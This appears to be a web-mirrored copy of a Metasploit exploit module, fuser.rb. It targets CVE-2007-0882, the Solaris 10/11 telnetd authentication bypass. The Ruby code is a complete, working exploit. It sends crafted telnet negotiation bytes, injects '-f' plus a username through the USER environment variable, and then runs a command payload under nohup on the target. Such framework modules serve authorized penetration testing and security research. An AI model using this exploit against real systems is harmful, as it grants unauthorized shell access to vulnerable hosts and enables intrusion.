Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/telnet/fuser.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',

16
        'Description' => %q{

17
          This module exploits the argument injection vulnerability

18
          in the telnet daemon (in.telnetd) of Solaris 10 and 11.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2007-0882' ],

24
          [ 'OSVDB', '31881'],

25
          [ 'BID', '22512' ],

26
        ],

27
        'Privileged' => false,

28
        'Platform' => %w[solaris unix],

29
        'Arch' => ARCH_CMD,

30
        'Payload' => {

31
          'Space' => 2000,

32
          'BadChars' => '',

33
          'DisableNops' => true,

34
          'Compat' => {

35
            'PayloadType' => 'cmd',

36
            'RequiredCmd' => 'generic perl telnet'

37
          }

38
        },

39
        'Targets' => [

40
          ['Automatic', {}],

41
        ],

42
        'DisclosureDate' => '2007-02-12',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Stability' => [CRASH_SAFE],

46
          'Reliability' => [REPEATABLE_SESSION],

47
          'SideEffects' => [IOC_IN_LOGS]

48
        }

49
      )

50
    )

51


52
    register_options([

53
      Opt::RPORT(23),

54
      OptString.new('USER', [ true, 'The username to use', 'bin' ]),

55
    ])

56
  end

57


58
  def exploit

59
    connect

60


61
    print_status('Setting USER environment variable...')

62


63
    req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"

64
    req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"

65
    req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"

66


67
    sock.put(req)

68
    sock.get_once

69


70
    req << "\xFF\xFC\x25"

71


72
    sock.put(req)

73
    sock.get_once

74


75
    req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"

76


77
    sock.put(req)

78
    sock.get_once

79


80
    req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"

81


82
    sock.put(req)

83
    sock.get_once

84


85
    req << "\xFF\xFE\x26\xFF\xFC\x23\xFF\xFC\x24"

86


87
    sock.put(req)

88
    sock.get_once

89


90
    req = "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"

91
    req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52"

92
    req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"

93


94
    sock.put(req)

95
    sock.get_once

96
    select(nil, nil, nil, 0.25)

97


98
    sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")

99


100
    select(nil, nil, nil, 0.25)

101


102
    handler

103
  end

104
end

105


106